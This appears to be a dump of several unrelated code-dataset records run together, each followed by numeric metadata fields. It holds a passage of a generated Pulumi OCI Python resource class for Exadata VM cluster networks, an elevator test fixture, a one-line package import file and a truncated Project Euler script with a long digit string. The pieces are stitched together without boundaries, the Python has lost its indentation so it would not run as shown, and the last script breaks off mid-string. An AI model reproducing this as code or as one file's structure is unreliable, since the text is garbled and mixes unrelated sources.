:param pulumi.Input[Sequence[pulumi.Input[str]]] ntps: (Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]] scans: (Updatable) The SCAN details.
:param pulumi.Input[str] state: The current state of the VM cluster network.
:param pulumi.Input[str] time_created: The date and time when the VM cluster network was created.
:param pulumi.Input[str] vm_cluster_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the associated VM Cluster.
:param pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]] vm_networks: (Updatable) Details of the client and backup networks.
"""
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if dns is not None:
pulumi.set(__self__, "dns", dns)
if exadata_infrastructure_id is not None:
pulumi.set(__self__, "exadata_infrastructure_id", exadata_infrastructure_id)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if ntps is not None:
pulumi.set(__self__, "ntps", ntps)
if scans is not None:
pulumi.set(__self__, "scans", scans)
if state is not None:
pulumi.set(__self__, "state", state)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if validate_vm_cluster_network is not None:
pulumi.set(__self__, "validate_vm_cluster_network", validate_vm_cluster_network)
if vm_cluster_id is not None:
pulumi.set(__self__, "vm_cluster_id", vm_cluster_id)
if vm_networks is not None:
pulumi.set(__self__, "vm_networks", vm_networks)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "dns")
@dns.setter
def dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns", value)
@property
@pulumi.getter(name="exadataInfrastructureId")
def exadata_infrastructure_id(self) -> Optional[pulumi.Input[str]]:
"""
The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "exadata_infrastructure_id")
@exadata_infrastructure_id.setter
def exadata_infrastructure_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exadata_infrastructure_id", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
Additional information about the current lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter
def ntps(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "ntps")
@ntps.setter
def ntps(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ntps", value)
@property
@pulumi.getter
def scans(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]]:
"""
(Updatable) The SCAN details.
"""
return pulumi.get(self, "scans")
@scans.setter
def scans(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkScanArgs']]]]):
pulumi.set(self, "scans", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current state of the VM cluster network.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time when the VM cluster network was created.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="validateVmClusterNetwork")
def validate_vm_cluster_network(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "validate_vm_cluster_network")
@validate_vm_cluster_network.setter
def validate_vm_cluster_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "validate_vm_cluster_network", value)
@property
@pulumi.getter(name="vmClusterId")
def vm_cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the associated VM Cluster.
"""
return pulumi.get(self, "vm_cluster_id")
@vm_cluster_id.setter
def vm_cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vm_cluster_id", value)
@property
@pulumi.getter(name="vmNetworks")
def vm_networks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]]:
"""
(Updatable) Details of the client and backup networks.
"""
return pulumi.get(self, "vm_networks")
@vm_networks.setter
def vm_networks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VmClusterNetworkVmNetworkArgs']]]]):
pulumi.set(self, "vm_networks", value)
class VmClusterNetwork(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
exadata_infrastructure_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scans: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None,
vm_networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]]] = None,
__props__=None):
"""
This resource provides the Vm Cluster Network resource in Oracle Cloud Infrastructure Database service.
Creates the VM cluster network. Applies to Exadata Cloud@Customer instances only.
To create a cloud VM cluster in an Exadata Cloud Service instance, use the [CreateCloudVmCluster ](https://docs.cloud.oracle.com/iaas/api/#/en/database/latest/CloudVmCluster/CreateCloudVmCluster) operation.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_vm_cluster_network = oci.database.VmClusterNetwork("testVmClusterNetwork",
compartment_id=var["compartment_id"],
display_name=var["vm_cluster_network_display_name"],
exadata_infrastructure_id=oci_database_exadata_infrastructure["test_exadata_infrastructure"]["id"],
scans=[oci.database.VmClusterNetworkScanArgs(
hostname=var["vm_cluster_network_scans_hostname"],
ips=var["vm_cluster_network_scans_ips"],
port=var["vm_cluster_network_scans_port"],
)],
vm_networks=[oci.database.VmClusterNetworkVmNetworkArgs(
domain_name=var["vm_cluster_network_vm_networks_domain_name"],
gateway=var["vm_cluster_network_vm_networks_gateway"],
netmask=var["vm_cluster_network_vm_networks_netmask"],
network_type=var["vm_cluster_network_vm_networks_network_type"],
nodes=[oci.database.VmClusterNetworkVmNetworkNodeArgs(
hostname=var["vm_cluster_network_vm_networks_nodes_hostname"],
ip=var["vm_cluster_network_vm_networks_nodes_ip"],
vip=var["vm_cluster_network_vm_networks_nodes_vip"],
vip_hostname=var["vm_cluster_network_vm_networks_nodes_vip_hostname"],
)],
vlan_id=var["vm_cluster_network_vm_networks_vlan_id"],
)],
defined_tags=var["vm_cluster_network_defined_tags"],
dns=var["vm_cluster_network_dns"],
freeform_tags={
"Department": "Finance",
},
ntps=var["vm_cluster_network_ntp"],
validate_vm_cluster_network=var["vm_cluster_network_validate_vm_cluster_network"])
```
## Import
VmClusterNetworks can be imported using the `id`, e.g.
```sh
$ pulumi import oci:database/vmClusterNetwork:VmClusterNetwork test_vm_cluster_network "exadataInfrastructures/{exadataInfrastructureId}/vmClusterNetworks/{vmClusterNetworkId}"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns: (Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[str] exadata_infrastructure_id: The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[Sequence[pulumi.Input[str]]] ntps: (Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]] scans: (Updatable) The SCAN details.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]] vm_networks: (Updatable) Details of the client and backup networks.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VmClusterNetworkArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Vm Cluster Network resource in Oracle Cloud Infrastructure Database service.
Creates the VM cluster network. Applies to Exadata Cloud@Customer instances only.
To create a cloud VM cluster in an Exadata Cloud Service instance, use the [CreateCloudVmCluster ](https://docs.cloud.oracle.com/iaas/api/#/en/database/latest/CloudVmCluster/CreateCloudVmCluster) operation.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_vm_cluster_network = oci.database.VmClusterNetwork("testVmClusterNetwork",
compartment_id=var["compartment_id"],
display_name=var["vm_cluster_network_display_name"],
exadata_infrastructure_id=oci_database_exadata_infrastructure["test_exadata_infrastructure"]["id"],
scans=[oci.database.VmClusterNetworkScanArgs(
hostname=var["vm_cluster_network_scans_hostname"],
ips=var["vm_cluster_network_scans_ips"],
port=var["vm_cluster_network_scans_port"],
)],
vm_networks=[oci.database.VmClusterNetworkVmNetworkArgs(
domain_name=var["vm_cluster_network_vm_networks_domain_name"],
gateway=var["vm_cluster_network_vm_networks_gateway"],
netmask=var["vm_cluster_network_vm_networks_netmask"],
network_type=var["vm_cluster_network_vm_networks_network_type"],
nodes=[oci.database.VmClusterNetworkVmNetworkNodeArgs(
hostname=var["vm_cluster_network_vm_networks_nodes_hostname"],
ip=var["vm_cluster_network_vm_networks_nodes_ip"],
vip=var["vm_cluster_network_vm_networks_nodes_vip"],
vip_hostname=var["vm_cluster_network_vm_networks_nodes_vip_hostname"],
)],
vlan_id=var["vm_cluster_network_vm_networks_vlan_id"],
)],
defined_tags=var["vm_cluster_network_defined_tags"],
dns=var["vm_cluster_network_dns"],
freeform_tags={
"Department": "Finance",
},
ntps=var["vm_cluster_network_ntp"],
validate_vm_cluster_network=var["vm_cluster_network_validate_vm_cluster_network"])
```
## Import
VmClusterNetworks can be imported using the `id`, e.g.
```sh
$ pulumi import oci:database/vmClusterNetwork:VmClusterNetwork test_vm_cluster_network "exadataInfrastructures/{exadataInfrastructureId}/vmClusterNetworks/{vmClusterNetworkId}"
```
:param str resource_name: The name of the resource.
:param VmClusterNetworkArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VmClusterNetworkArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
exadata_infrastructure_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scans: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None,
vm_networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VmClusterNetworkArgs.__new__(VmClusterNetworkArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["dns"] = dns
if exadata_infrastructure_id is None and not opts.urn:
raise TypeError("Missing required property 'exadata_infrastructure_id'")
__props__.__dict__["exadata_infrastructure_id"] = exadata_infrastructure_id
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["ntps"] = ntps
if scans is None and not opts.urn:
raise TypeError("Missing required property 'scans'")
__props__.__dict__["scans"] = scans
__props__.__dict__["validate_vm_cluster_network"] = validate_vm_cluster_network
if vm_networks is None and not opts.urn:
raise TypeError("Missing required property 'vm_networks'")
__props__.__dict__["vm_networks"] = vm_networks
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["state"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["vm_cluster_id"] = None
super(VmClusterNetwork, __self__).__init__(
'oci:database/vmClusterNetwork:VmClusterNetwork',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
exadata_infrastructure_id: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
ntps: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scans: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
validate_vm_cluster_network: Optional[pulumi.Input[bool]] = None,
vm_cluster_id: Optional[pulumi.Input[str]] = None,
vm_networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]]] = None) -> 'VmClusterNetwork':
"""
Get an existing VmClusterNetwork resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns: (Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[str] exadata_infrastructure_id: The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycle state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ntps: (Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkScanArgs']]]] scans: (Updatable) The SCAN details.
:param pulumi.Input[str] state: The current state of the VM cluster network.
:param pulumi.Input[str] time_created: The date and time when the VM cluster network was created.
:param pulumi.Input[str] vm_cluster_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the associated VM Cluster.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VmClusterNetworkVmNetworkArgs']]]] vm_networks: (Updatable) Details of the client and backup networks.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VmClusterNetworkState.__new__(_VmClusterNetworkState)
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["dns"] = dns
__props__.__dict__["exadata_infrastructure_id"] = exadata_infrastructure_id
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["ntps"] = ntps
__props__.__dict__["scans"] = scans
__props__.__dict__["state"] = state
__props__.__dict__["time_created"] = time_created
__props__.__dict__["validate_vm_cluster_network"] = validate_vm_cluster_network
__props__.__dict__["vm_cluster_id"] = vm_cluster_id
__props__.__dict__["vm_networks"] = vm_networks
return VmClusterNetwork(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
The user-friendly name for the Exadata Cloud@Customer VM cluster network. The name does not need to be unique.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def dns(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) The list of DNS server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "dns")
@property
@pulumi.getter(name="exadataInfrastructureId")
def exadata_infrastructure_id(self) -> pulumi.Output[str]:
"""
The Exadata infrastructure [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "exadata_infrastructure_id")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
Additional information about the current lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter
def ntps(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) The list of NTP server IP addresses. Maximum of 3 allowed.
"""
return pulumi.get(self, "ntps")
@property
@pulumi.getter
def scans(self) -> pulumi.Output[Sequence['outputs.VmClusterNetworkScan']]:
"""
(Updatable) The SCAN details.
"""
return pulumi.get(self, "scans")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the VM cluster network.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time when the VM cluster network was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="validateVmClusterNetwork")
def validate_vm_cluster_network(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "validate_vm_cluster_network")
@property
@pulumi.getter(name="vmClusterId")
def vm_cluster_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the associated VM Cluster.
"""
return pulumi.get(self, "vm_cluster_id")
@property
@pulumi.getter(name="vmNetworks")
def vm_networks(self) -> pulumi.Output[Sequence['outputs.VmClusterNetworkVmNetwork']]:
"""
(Updatable) Details of the client and backup networks.
"""
return pulumi.get(self, "vm_networks")
| 52.703752 | 347 | 0.675405 | 4,778 | 40,740 | 5.536836 | 0.052532 | 0.085655 | 0.048157 | 0.04914 | 0.918352 | 0.898696 | 0.878586 | 0.858174 | 0.853752 | 0.822982 | 0 | 0.000467 | 0.21242 | 40,740 | 772 | 348 | 52.772021 | 0.824035 | 0.405351 | 0 | 0.689573 | 1 | 0 | 0.126181 | 0.054901 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163507 | false | 0.00237 | 0.016588 | 0.007109 | 0.279621 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ace865d9ded6e26bcfc3d3dc7f19574ee23b0ca5 | 303 | py | Python | elevator_service/resources/test_elevator.py | Kalimaha/ElevatorSimulatorServices | ff905b7cd7c9cfed9f39c876646e71194dcd732a | [
"MIT"
] | null | null | null | elevator_service/resources/test_elevator.py | Kalimaha/ElevatorSimulatorServices | ff905b7cd7c9cfed9f39c876646e71194dcd732a | [
"MIT"
] | null | null | null | elevator_service/resources/test_elevator.py | Kalimaha/ElevatorSimulatorServices | ff905b7cd7c9cfed9f39c876646e71194dcd732a | [
"MIT"
] | null | null | null | elevator_1 = {
"id": "A",
"session": "alpha",
"time": 1,
"floor": 1,
"people": 0,
"direction": "stationary",
"stops": []
}
elevator_2 = {
"id": "B",
"session": "alpha",
"time": 1,
"floor": 1,
"people": 0,
"direction": "stationary",
"stops": []
}
| 15.15 | 30 | 0.442244 | 30 | 303 | 4.4 | 0.5 | 0.181818 | 0.242424 | 0.257576 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0 | 0.038095 | 0.306931 | 303 | 19 | 31 | 15.947368 | 0.590476 | 0 | 0 | 0.666667 | 0 | 0 | 0.356436 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c5afc7115d342554ea72729143661de488450c48 | 41 | py | Python | src/__init__.py | openclimatefix/predict_pv_yield_OLD | e569e240915ba17b8f6274814f8ceaeebb8ab32b | [
"Apache-2.0"
] | 1 | 2021-07-10T17:48:46.000Z | 2021-07-10T17:48:46.000Z | src/__init__.py | merq2019/predict_pv_yield | 7db72e6d16bed90927a3e1b28037c66c3dabe307 | [
"Apache-2.0"
] | null | null | null | src/__init__.py | merq2019/predict_pv_yield | 7db72e6d16bed90927a3e1b28037c66c3dabe307 | [
"Apache-2.0"
] | null | null | null | from . import features
from . import data | 20.5 | 22 | 0.780488 | 6 | 41 | 5.333333 | 0.666667 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170732 | 41 | 2 | 23 | 20.5 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c5d160028b470aeda72d3151abc14a766bb71de1 | 5,107 | py | Python | Project Euler/pe13.py | NicolasBizzozzero/Online-Judges | e0b492d2eb301cc46691cd9809ea54e8c13cbed0 | [
"Unlicense"
] | null | null | null | Project Euler/pe13.py | NicolasBizzozzero/Online-Judges | e0b492d2eb301cc46691cd9809ea54e8c13cbed0 | [
"Unlicense"
] | null | null | null | Project Euler/pe13.py | NicolasBizzozzero/Online-Judges | e0b492d2eb301cc46691cd9809ea54e8c13cbed0 | [
"Unlicense"
] | null | null | null | str = "3710728753390210279879799822083759024651013574025046376937677490009712648124896970078050417018260538743249861995247410594742333095130581237266173096299194221336357416157252243056330181107240615490825023067588207539346171171980310421047513778063246676892616706966236338201363784183836841787343617267572811287981284997940806548193159262169127588983273844274228917432520321923589422876796487670272189318474514457360013064390911672168568445887116031532767038648610584302543993961982891759366568675793495162176457141856560629502157223196586755079324193331649063524627419049291014324458138226633479447581789257586771833721766196375159057923972824559883840758203565325359399008402633568948830189458628227828801811993848262820142781941399405675871511700943903539866437282711265382998724078447305319010429358686515506006295864861532075273371959191420517255829716938887077154664991155934876035329217149700569385437007057682668462462149565007647178729443837760453282654108756828443191190634694037855217779295145361232725250002960710750825638156567108852583507214587657617241097644733911060721826523687722363604517423706905851860660448207621209813287860733969412811426604180868306193284608111910615569405126896925193432545172838864191804704929321505864256304948362467221648435076201727918039944693004732956340691157324443869081257945140890577062294291971079282095503768752567877309186254074496984450833039368212618336384825330154686196124348767681297534375946515803862875928784902015216855548287172012192577669547818283375799310361474035685644909552709786479758116726320100436897842553539920931837441497806860984484030981290777917990882187953273644756755908480308708698755139271185451707854416185242432069315033259959406895756536782107074926966537676326235447210697939506796526947425977097391666937630426339870851052684708299085211399427365734116182760315001271653786073615010808570091499395125570281987460043755829035317434717326932123578154982629742552737307949537597651053059469660676831565743771674018752758890280257173322961917666871381993181104877019027125267680276078003013678680992525463401061632866526362702185404977055856299465806362379931407462559622407448690823117497779236546625724692332281091714191430288197103288597806669760892938638285025333403344130655780161278159218150055618688364684200904702305308117281643048762379196984248725503663878458311487696932154902810424020138335124462181441773470637832994906362596664985876182212252255124867645336772018697169854431241957240991395900895231005882295548255300263520781532296796249481641953868218774608532713228572311042480345612486769706450799523637774242535411291684276865538926205024910326572967237019132757256752856532482582654630922070585965222979886027225833191312637514734199488953476574550118495701454879288984856827726077713721403798879715382982037830314735277215803481445134913732266513813482954382919991818027891652243102739225112286953940957953066405232632538044100059654939159879593635297461521855023713076422551211836938035803885849034169811622207297718615823667842468915799353296192262467957194401269043877107275048102390895523597457231897067725479150615055049539229795309011299675198618808822587531452958409925120382900940777077567211306739708304724483816533873502340845647058077308829591747671403631980081871290118754913105471265819762333104481838626951545633492636657289756340050042846280183517070527831839425882145521227251250327551216035469812005817621652128276527516912968977893223819573432933994643750190783694576588335239988675506164965184775180738168837861091527357929701337621778427521926234019423996